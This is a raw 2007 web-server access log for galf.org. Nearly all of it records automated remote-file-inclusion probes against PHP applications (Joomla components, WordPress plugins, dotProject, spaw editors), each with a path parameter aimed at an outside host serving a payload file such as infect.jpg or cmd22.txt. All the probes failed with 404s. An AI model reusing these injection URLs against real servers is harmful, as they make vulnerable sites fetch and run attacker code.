195.3.85.33 - - [07/Oct/2007:17:00:10 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:17:00:10 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.97.178.20 - - [07/Oct/2007:17:00:19 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
208.97.178.20 - - [07/Oct/2007:17:00:19 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
206.225.86.155 - - [07/Oct/2007:17:01:16 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:01:16 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
82.99.30.18 - - [07/Oct/2007:17:02:23 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
66.103.128.44 - - [07/Oct/2007:17:02:45 -0700] "GET /logs/access_070618.log//components/com_simpleboard/file_upload.php?sbp=http://coincidence.loudnsick.de//language/lang_english/pr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:02:58 -0700] "GET /logs/access_070625.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:03:03 -0700] "GET /logs/access_070618.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:03:20 -0700] "GET /logs/access_070625.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:03:25 -0700] "GET /logs/access_070618.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:17:03:41 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:17:03:49 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:17:03:49 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:06:13 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:06:14 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.239.140.2 - - [07/Oct/2007:17:06:27 -0700] "GET /logs/access_070730.log//agendax/addevent.inc.php?agendax_path=http://creation.g-nova.fr/asprofirst/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:07:08 -0700] "GET /logs/wp-content/plugins/wp-table/js/wptable-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:07:08 -0700] "GET /wp-content/plugins/wp-table/js/wptable-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:17:07:32 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:17:07:32 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:07:49 -0700] "GET /logs/access_070806.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:07:49 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:07:50 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:08:32 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:08:33 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:17:08:59 -0700] "GET /logs/access_070826.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
71.233.28.211 - - [07/Oct/2007:17:10:16 -0700] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
71.233.28.211 - - [07/Oct/2007:17:10:16 -0700] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:11:09 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:11:09 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.158.181.14 - - [07/Oct/2007:17:11:12 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://coincidence.loudnsick.de//language/lang_english/pr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.181.14 - - [07/Oct/2007:17:11:12 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://coincidence.loudnsick.de//language/lang_english/pr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.181.14 - - [07/Oct/2007:17:11:12 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://coincidence.loudnsick.de//language/lang_english/pr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:12:00 -0700] "GET /logs/wp-content/plugins/wp-table/js/wptable-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:12:00 -0700] "GET /wp-content/plugins/wp-table/js/wptable-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:12:32 -0700] "GET /logs/access_070618.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:13:29 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:13:30 -0700] "GET /logs/access_070702.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:14:26 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:14:26 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.158.181.14 - - [07/Oct/2007:17:14:27 -0700] "GET /logs/access_070618.log//components/com_simpleboard/file_upload.php?sbp=http://coincidence.loudnsick.de//language/lang_english/pr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:16:30 -0700] "GET /logs/access_070625.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.92.85.234 - - [07/Oct/2007:17:16:38 -0700] "GET /logs/access_070618.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:16:53 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:16:53 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.2.212.50 - - [07/Oct/2007:17:17:37 -0700] "GET /logs/access_070820.log/index.php?pag=http://www.bwa-handball.de/cms/images/stories/cmd22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
200.2.212.50 - - [07/Oct/2007:17:17:39 -0700] "GET /index.php?pag=http://www.bwa-handball.de/cms/images/stories/cmd22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.2.212.50 - - [07/Oct/2007:17:17:40 -0700] "GET /logs/index.php?pag=http://www.bwa-handball.de/cms/images/stories/cmd22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:17:17:42 -0700] "GET /logs/access_070910.log//dotproject/includes/db_adodb.php?baseDir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:17:17:43 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:18:03 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:18:03 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:17:18:10 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:17:18:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:17:18:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:17:18:15 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:17:18:24 -0700] "GET /logs/access_070826.log//include.php?path[docroot]=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.229 - - [07/Oct/2007:17:18:40 -0700] "GET /labia/?M=D HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.20.22 - - [07/Oct/2007:17:18:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.180.250.111 - - [07/Oct/2007:17:18:49 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:22:39 -0700] "GET /logs/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:22:40 -0700] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.89.135 - - [07/Oct/2007:17:22:45 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.89.135 - - [07/Oct/2007:17:22:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:22:47 -0700] "GET /logs/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:22:47 -0700] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.69.52.141 - - [07/Oct/2007:17:22:54 -0700] "GET /logs/access_070604.log/index.php?cmd=http://www.hello.25s.com/rzl.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:23:13 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.106.42.129 - - [07/Oct/2007:17:23:14 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:23:51 -0700] "GET /logs/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:23:51 -0700] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
206.225.86.155 - - [07/Oct/2007:17:24:19 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:24:19 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:25:02 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:25:02 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.106.42.129 - - [07/Oct/2007:17:25:12 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:25:12 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.208.228 - - [07/Oct/2007:17:25:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.228 - - [07/Oct/2007:17:25:20 -0700] "GET /labia/?S=D HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
206.225.86.155 - - [07/Oct/2007:17:26:27 -0700] "GET /logs/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:26:27 -0700] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:26:29 -0700] "GET /logs/access_070618.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:17:27:19 -0700] "GET /logs/access.log//dotproject/includes/db_adodb.php?baseDir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
74.124.198.61 - - [07/Oct/2007:17:27:20 -0700] "GET /logs/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:27:25 -0700] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:27:29 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:17:27:29 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
211.48.20.82 - - [07/Oct/2007:17:27:33 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:27:52 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:27:52 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
71.233.28.211 - - [07/Oct/2007:17:28:16 -0700] "GET /logs/access.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:28:20 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.203.122.135 - - [07/Oct/2007:17:28:43 -0700] "GET /logs/access.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:28:43 -0700] "GET /logs/access_070618.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:28:46 -0700] "GET /logs/access_070820.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
89.89.224.76 - - [07/Oct/2007:17:28:54 -0700] "GET /logs/access_071001.log HTTP/1.0" 200 5105755 "-" "Wget/1.10.2" "galf.org"
72.37.212.106 - - [07/Oct/2007:17:29:02 -0700] "GET /logs/access_070618.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:29:04 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:29:04 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:29:06 -0700] "GET /logs/access_070820.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.216.100 - - [07/Oct/2007:17:29:53 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:17:30:00 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:17:30:01 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:30:02 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:17:30:02 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
206.225.86.155 - - [07/Oct/2007:17:30:02 -0700] "GET /logs/access_070827.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:30:08 -0700] "GET /logs/access_070910.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
208.97.178.20 - - [07/Oct/2007:17:30:25 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.97.178.20 - - [07/Oct/2007:17:30:25 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:30:44 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:17:30:44 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:17:30:51 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:17:30:51 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:17:31:35 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.37.212.106 - - [07/Oct/2007:17:31:35 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.28.219 - - [07/Oct/2007:17:32:12 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.23.153 - - [07/Oct/2007:17:32:12 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.92.85.234 - - [07/Oct/2007:17:32:41 -0700] "GET /logs/access_070618.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:17:32:53 -0700] "GET /logs/access_070820.log/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
